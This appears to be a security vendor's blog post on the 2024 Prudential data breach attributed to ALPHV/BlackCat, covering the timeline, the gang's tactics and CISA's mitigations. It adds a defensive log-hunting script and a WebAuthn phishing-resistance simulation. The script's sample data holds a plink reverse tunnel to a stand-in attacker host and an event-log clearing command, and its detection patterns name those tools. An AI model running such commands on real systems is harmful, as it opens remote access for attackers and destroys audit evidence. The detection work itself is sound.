Prudential Data Breach Affecting 2.5 Million

July 4, 2024
CVE or Exploit Name

Prudential Financial Data Breach

Timeline
  • February 5, 2024

    Prudential Financial detected unauthorized access to its IT infrastructure, the incident it subsequently reported to the Securities and Exchange Commission (SEC) on Form 8-K.

  • February 13, 2024

    Prudential Financial filed a Form 8-K with the SEC, stating that it had not found evidence of customer or client data theft and that the incident was reported to law enforcement and regulatory authorities.

  • February 16, 2024

    SecurityWeek reported that BlackCat (ALPHV) claimed responsibility for the attack by listing Prudential on its Tor leak site; Prudential Financial has not confirmed the attribution. Prudential stated that the attackers accessed administrative and user data, as well as user accounts associated with employees and contractors.

  • April 3, 2024

    In a filing with the Maine Attorney General’s Office, Prudential revealed that the hackers had stolen information from more than 36,000 individuals, who are being sent written notifications about the incident. The company confirmed that the attackers no longer have access to its systems.

  • June 17, 2024

    Plaintiff Constance Boyd filed a class-action lawsuit against Prudential Financial Inc.

  • July 1, 2024

    Dark Reading reported that the Prudential data breach victim count had risen to 2.5 million individuals.

Overview of Exploit

Prudential, the second-largest life insurance company in the United States, employs 40,000 people worldwide and reported revenues exceeding $50 billion in 2023. Following its February Form 8-K to the SEC about the unauthorized access detected on February 5, Prudential has now disclosed, in an updated notice to the Maine Attorney General's Office, that a threat actor obtained the data of 2.5 million individuals. The disclosure comes in a year in which several Fortune 500 companies, including Bank of America, have been affected by cyberattacks.

Impact

The ransomware group ALPHV (also known as BlackCat) claimed responsibility for the attack, but Prudential Financial has not confirmed that ALPHV was behind it. The same gang was responsible for the UnitedHealth (Change Healthcare) attack, in which it stole data, reportedly collected a ransom payment of roughly $22 million, and then shut down in an exit scam, keeping the affiliate's share of the payment.

In its February SEC filing, Prudential said it had found no evidence of customer or client data theft. By early April, in a filing with the Maine Attorney General's Office, the company reported that more than 36,000 individuals might have been affected.

In an incident notice update filed with the Maine Attorney General’s Office in the last week of June, Prudential revealed that the incident resulted in the data of 2,556,210 individuals being compromised. The stolen information included names, addresses, driver’s license numbers, and non-driver identification card numbers, as previously disclosed by the company.

Dark Reading reported at the time of the February filing that Prudential's incident response was still in its early stages: it was unclear whether the attackers had accessed additional information or systems, whether customer or client data had been stolen, or whether the incident would have a material impact on Prudential's operations. With no evidence of any of those scenarios, Prudential was not yet required to report the breach under the SEC's materiality-based disclosure rule, and researchers suggested that its filing could signal a new trend of proactive disclosure.

Why is This Important

Ransomware attacks have increased dramatically: the average ransom payment rose 500% in the last year, 63% of ransom demands were for $1 million or more, and 30% of demands exceeded $5 million. The FBI has ranked BlackCat, also known as ALPHV, among the top five ransomware gangs targeting U.S. businesses.

Dark Reading has also reported a troubling new trend of ransomware gangs weaponizing the law: filing formal complaints with the SEC alleging that their recent victims are not complying with the SEC's cybersecurity disclosure rule, which requires publicly traded companies to file a Form 8-K within four business days of determining that a cybersecurity incident is material. ALPHV (BlackCat) did this against another victim in late 2023, before the rule had taken effect in December of that year. Now that the rule is in force, threat actors can use the legal requirement itself as additional pressure on victims, playing a double game with the disclosure regime.

Implications

The attack on Prudential Financial has significant implications. Financial losses will likely result from incident response, remediation, and potential regulatory fines, alongside potential lawsuits like the class action filed by Constance Boyd. The breach has also damaged Prudential’s reputation, eroding customer trust and potentially leading to customer attrition and long-term brand damage.

Increased regulatory scrutiny and potential penalties from authorities such as the SEC and state attorneys general could follow, adding to operational burdens.

The attack and subsequent investigation may disrupt day-to-day operations, since compromised employee and contractor accounts must be identified, reset, and monitored. Legal ramifications include significant legal fees and settlements from the class action lawsuit and other potential legal actions, diverting executive focus from strategic initiatives. Prudential will likely need to invest heavily in cybersecurity infrastructure, training, and processes to prevent future incidents, leading to increased operating costs and a reevaluation of current IT practices.

The attack could also impact Prudential’s stock price as investors react to the breach’s fallout, potentially affecting shareholder value. With new disclosure regulations on the horizon, Prudential will need to adapt to more stringent reporting requirements, involving significant changes to internal processes and increased transparency regarding cybersecurity practices.

How it Happened

No information has been released about the specific entry point or method through which ALPHV/BlackCat affiliates infiltrated Prudential Financial's IT infrastructure. However, CISA's advisory on ALPHV/BlackCat (AA23-353A) notes that affiliates rely on advanced social engineering and open-source intelligence gathering to gain initial access: they impersonate IT or helpdesk staff via phone calls or SMS to obtain employee credentials, then use those credentials to reach the network. Once inside, they deploy remote access and sync tools such as AnyDesk, MEGAsync, and Splashtop, create accounts such as "aadmin", and use Kerberos token generation for domain access. During the UnitedHealth incident, it was speculated that BlackCat exploited vulnerabilities in ConnectWise ScreenConnect, a remote access tool.

Following network infiltration, ALPHV/BlackCat affiliates use legitimate tools such as Plink and Ngrok for remote access and beacon with Brute Ratel C4 and Cobalt Strike for command and control. They use Evilginx2 for adversary-in-the-middle (AiTM) phishing, proxying the real login page to capture credentials, MFA codes, and session cookies, which lets them bypass any MFA factor that can simply be relayed. They then move laterally across the network, harvesting passwords from domain controllers, the local network, and backup servers.

To evade detection, they use allowlisted applications such as Metasploit, clear logs on Exchange servers, and exfiltrate data through cloud services such as Mega.nz or Dropbox. Ransomware deployment includes dropping a ransom note as "file.txt" and terminating security processes with tools such as POORTRY and STONESTOP.

Some affiliates exfiltrate data and extort the victim without deploying ransomware at all. After exfiltrating and/or encrypting data, affiliates communicate with victims via TOR, Tox, email, or encrypted messaging applications, and may offer "cyber remediation advice" after payment, promising a vulnerability report and security recommendations. Encrypted files receive a seven-digit extension, and the ransom note follows the naming convention "RECOVER-(seven-digit extension) FILES.txt".
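The tradecraft above is concrete enough to hunt for. The following is an added example, not code from the page or from CISA: a small hunt over Windows Security event records for the behaviours described in this section (the rogue "aadmin" account, AnyDesk/Splashtop/MEGAsync execution, event-log clearing, Plink/Ngrok tunnelling), each tagged with its ATT&CK technique. Event IDs and field names are the real Windows Security log ones; the host names, user names and event records are constructed for the example.

```python
"""
Added example, not from the page or from CISA: a small hunt over Windows
Security events for the ALPHV/BlackCat tradecraft described above (rogue
"aadmin" account, remote-access and cloud-sync tools, log clearing, tunnelling).
Event IDs and field names are the real Windows Security log ones; the event
records below are constructed for this example.
"""
import ntpath
import re
from collections import defaultdict

# Event 4688 only carries CommandLine when "Include command line in process
# creation events" is enabled in audit policy; the log-clearing rule relies on it.
SAMPLE_EVENTS = [  # constructed
    {"EventID": 4720, "Host": "WS-017", "SubjectUserName": "jdoe", "TargetUserName": "aadmin"},
    {"EventID": 4688, "Host": "WS-017", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Users\jdoe\Downloads\AnyDesk.exe", "CommandLine": "AnyDesk.exe --install"},
    {"EventID": 4688, "Host": "WS-017", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Users\jdoe\AppData\Local\MEGAsync\MEGAsync.exe", "CommandLine": "MEGAsync.exe"},
    {"EventID": 4688, "Host": "SRV-EXCH01", "SubjectUserName": "aadmin",
     "NewProcessName": r"C:\Windows\System32\wevtutil.exe", "CommandLine": "wevtutil cl Security"},
    {"EventID": 4688, "Host": "DC01", "SubjectUserName": "aadmin",
     "NewProcessName": r"C:\Temp\plink.exe", "CommandLine": "plink.exe -R 3389:127.0.0.1:3389 attacker.test"},
    {"EventID": 4688, "Host": "WS-042", "SubjectUserName": "asmith",
     "NewProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "CommandLine": "WINWORD.EXE"},
]

# (pattern on process basename, ATT&CK technique, description)
TOOL_RULES = [
    (re.compile(r"^(anydesk|splashtop\w*)\.exe$", re.I), "T1219", "remote access software"),
    (re.compile(r"^megasync\.exe$", re.I), "T1567.002", "cloud-storage sync client (exfil path)"),
    (re.compile(r"^(plink|ngrok)\.exe$", re.I), "T1572", "tunnelling/port-forwarding tool"),
]
LOG_CLEAR = re.compile(r"\b(wevtutil(\.exe)?\s+(cl|clear-log)\b|clear-eventlog\b)", re.I)
ROGUE_ACCOUNT = re.compile(r"^aadmin$", re.I)   # account name reported in the CISA advisory


def hunt(events):
    """Return one finding per matched event: host, user, ATT&CK technique, detail."""
    findings = []
    for ev in events:
        host, user = ev.get("Host", "?"), ev.get("SubjectUserName", "?")
        if ev.get("EventID") == 4720 and ROGUE_ACCOUNT.match(ev.get("TargetUserName", "")):
            findings.append({"host": host, "user": user, "technique": "T1136.001",
                             "detail": f"local account {ev['TargetUserName']!r} created"})
        elif ev.get("EventID") == 4688:
            exe = ntpath.basename(ev.get("NewProcessName", ""))
            cmd = ev.get("CommandLine", "")
            if LOG_CLEAR.search(cmd):
                findings.append({"host": host, "user": user, "technique": "T1070.001",
                                 "detail": f"event log cleared: {cmd}"})
                continue
            for pattern, technique, desc in TOOL_RULES:
                if pattern.match(exe):
                    findings.append({"host": host, "user": user, "technique": technique,
                                     "detail": f"{desc}: {exe}"})
                    break
    return findings


def score_by_host(findings):
    """Number of distinct techniques seen per host; a host accumulating several
    stages of the chain (new account, RAT, sync client) deserves attention first."""
    seen = defaultdict(set)
    for f in findings:
        seen[f["host"]].add(f["technique"])
    return {host: len(t) for host, t in seen.items()}


def activity_by_rogue_accounts(events, findings):
    """Follow-on: every process launched under an account that a 4720 finding created."""
    created = {f["detail"].split("'")[1] for f in findings if f["technique"] == "T1136.001"}
    return [ev for ev in events if ev.get("EventID") == 4688 and ev.get("SubjectUserName") in created]


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']:<11} {f['user']:<8} {f['technique']:<10} {f['detail']}")
    print("per-host technique count:", score_by_host(found))
    print("events run by rogue accounts:", len(activity_by_rogue_accounts(SAMPLE_EVENTS, found)))
```

On the constructed sample, the Word launch on WS-042 produces no finding, WS-017 accumulates three techniques (account creation, AnyDesk, MEGAsync), and the two processes run under the freshly created "aadmin" account on the Exchange server and the domain controller are surfaced by the follow-on query. In production the same rules would be fed from a SIEM export rather than an inline list, and the tool allowlist would be tuned to whichever remote-access products the organization has actually sanctioned.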

Recommendation and Remediation

CISA has issued recommendations to help organizations mitigate the threat posed by ALPHV/BlackCat ransomware. These include:

  1. Routinely take inventory of assets and data to identify authorized and unauthorized devices and software.
  2. Prioritize remediation of known exploited vulnerabilities.
  3. Enable and enforce multifactor authentication with strong passwords.
  4. Close unused ports and remove applications not needed for day-to-day operations.
  5. Secure remote access tools, restricting them to approved and audited products.
  6. Implement phishing-resistant MFA such as FIDO/WebAuthn or PKI-based authentication, which an Evilginx2-style proxy cannot relay.
  7. Monitor network activity for abnormalities, and monitor internal mail and messaging.
  8. Train users to recognize social engineering and phishing, including helpdesk-impersonation calls and texts.

Finally, organizations are encouraged to validate their security controls against the MITRE ATT&CK for Enterprise framework and the specific threat behaviors attributed to ALPHV/BlackCat, whether in-house or with a testing partner such as BreachLock. Following these recommendations strengthens an organization's security posture and reduces the risk of compromise by ALPHV/BlackCat threat actors.
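The recommendation to move to FIDO/WebAuthn follows directly from the Evilginx2 tradecraft described under How it Happened, and it is worth seeing why. The following is an added example, not code from the page, from CISA, or from any WebAuthn library: a simulation of the two logins the proxy sits between. The rpId, origin, challenge and user-presence checks are the relying-party checks the WebAuthn specification requires; the authenticator's ES256 signature is replaced by an HMAC stand-in (marked in the code) so the example runs on the Python standard library alone. The relying-party id, the proxy origin, the TOTP seed and the credential secret are all constructed for the example.

```python
"""
Added example (not from the page, CISA, or any WebAuthn library): why a FIDO/WebAuthn
login survives an Evilginx2-style adversary-in-the-middle proxy while a relayed
one-time code does not. The rpId, origin, challenge and user-presence checks are the
relying-party checks the WebAuthn spec requires; the authenticator's ES256 signature
is replaced by an HMAC stand-in (marked below) so this runs on the standard library.
Origins, names and secrets are constructed for this example.
"""
import base64
import hashlib
import hmac
import json
import os

RP_ID = "login.example-insurer.test"                        # assumed relying-party id
RP_ORIGIN = "https://" + RP_ID
PHISH_ORIGIN = "https://login.example-insurer-secure.test"  # the AiTM proxy's origin

def b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def unb64url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def totp(secret: bytes, t: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP. Nothing in the code ties it to the site the user typed it
    into, so a proxy forwards it to the real site unchanged and it is accepted."""
    mac = hmac.new(secret, (t // step).to_bytes(8, "big"), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = int.from_bytes(mac[off:off + 4], "big") & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"

class SecurityError(Exception):
    """Raised where a browser would reject navigator.credentials.get()."""

def browser_get_assertion(page_origin, requested_rp_id, challenge, credentials):
    """navigator.credentials.get() as the browser performs it. The browser, not page
    JavaScript, takes the origin from the URL bar: it refuses an rpId that is not a
    registrable suffix of that origin and writes the origin into clientDataJSON,
    which the authenticator signs over."""
    host = page_origin.split("://", 1)[1]
    if not (host == requested_rp_id or host.endswith("." + requested_rp_id)):
        raise SecurityError(f"rpId {requested_rp_id!r} is outside origin {page_origin!r}")
    cred = credentials.get(requested_rp_id)           # credentials are scoped per rpId
    if cred is None:
        raise SecurityError(f"no credential registered for rpId {requested_rp_id!r}")
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, separators=(",", ":")).encode()
    # authenticatorData = SHA-256(rpId) || flags (UP bit set) || 32-bit signCount
    auth_data = hashlib.sha256(requested_rp_id.encode()).digest() + b"\x01" + (1).to_bytes(4, "big")
    # STAND-IN for the ES256 signature over authenticatorData || SHA-256(clientDataJSON)
    sig = hmac.new(cred, auth_data + hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
    return {"clientDataJSON": b64url(client_data), "authenticatorData": b64url(auth_data),
            "signature": b64url(sig)}

def rp_verify_assertion(cred, assertion, expected_challenge) -> bool:
    """Relying-party verification of an assertion against the stored credential."""
    client_raw = unb64url(assertion["clientDataJSON"])
    client = json.loads(client_raw)
    auth_data = unb64url(assertion["authenticatorData"])
    if client.get("type") != "webauthn.get":
        return False
    if not hmac.compare_digest(client.get("challenge", ""), expected_challenge):
        return False                                  # replayed assertion
    if client.get("origin") != RP_ORIGIN:
        return False                                  # the proxy's origin lands here
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False                                  # rpIdHash mismatch
    if not auth_data[32] & 0x01:
        return False                                  # user-presence flag not set
    expected = hmac.new(cred, auth_data + hashlib.sha256(client_raw).digest(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, unb64url(assertion["signature"]))

def run_scenarios() -> dict:
    """One victim on the proxy's page, first with TOTP, then with a FIDO credential."""
    r, otp_seed, now = {}, b"constructed-totp-seed", 1_720_000_000
    r["totp_relayed_accepted"] = totp(otp_seed, now) == totp(otp_seed, now)  # relayed digits verify
    cred = os.urandom(32)                             # stand-in for the credential key pair
    creds = {RP_ID: cred}                             # registered for the real rpId only
    ch = b64url(os.urandom(32))
    legit = browser_get_assertion(RP_ORIGIN, RP_ID, ch, creds)
    r["legit_accepted"] = rp_verify_assertion(cred, legit, ch)
    for label, rp_id in (("aitm_real_rpid", RP_ID), ("aitm_own_rpid", PHISH_ORIGIN[8:])):
        try:                                          # victim's browser sits on the proxy origin
            browser_get_assertion(PHISH_ORIGIN, rp_id, b64url(os.urandom(32)), creds)
            r[label + "_assertion_obtained"] = True
        except SecurityError:
            r[label + "_assertion_obtained"] = False
    r["replay_accepted"] = rp_verify_assertion(cred, legit, b64url(os.urandom(32)))
    ch2 = b64url(os.urandom(32))                      # attacker rewrites origin + challenge
    forged = dict(legit, clientDataJSON=b64url(json.dumps(
        {"type": "webauthn.get", "challenge": ch2, "origin": RP_ORIGIN}).encode()))
    r["forged_origin_accepted"] = rp_verify_assertion(cred, forged, ch2)
    return r

if __name__ == "__main__":
    for k, v in run_scenarios().items():
        print(f"{k:<36} {v}")
```

The six-digit code the victim types into the proxied page verifies at the real site because nothing in it says where it was typed. The FIDO login fails earlier and for a stronger reason: the victim's browser is on the proxy's origin, so it refuses to exercise a credential scoped to the real rpId, and if the attacker rewrites the page to ask for their own rpId there is no credential for it. Even an attacker who captures a genuine assertion can neither replay it (fresh challenge) nor edit clientDataJSON to claim the real origin, because the origin field is covered by the signature. That signed, browser-supplied origin is the property the CISA recommendation is pointing at; a real deployment verifies an ES256 signature with a WebAuthn library rather than the HMAC stand-in used here.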

CISA's STIX indicator bundles for advisory AA23-353A (#StopRansomware: ALPHV Blackcat):

https://www.cisa.gov/sites/default/files/2024-02/AA23-353A.stix_.xml

https://www.cisa.gov/sites/default/files/2024-02/AA23-353A-StopRansomware-ALPHV-Blackcat.stix_.json

About BreachLock

BreachLock is a global leader in Continuous Attack Surface Discovery and Penetration Testing. Continuously discover, prioritize, and mitigate exposures with evidence-backed Attack Surface Management, Penetration Testing, and Red Teaming.

Elevate your defense strategy with an attacker’s view that goes beyond common vulnerabilities and exposures. Each risk we uncover is backed by validated evidence. We test your entire attack surface and help you mitigate your next cyber breach before it occurs.

Know Your Risk. Contact BreachLock today!
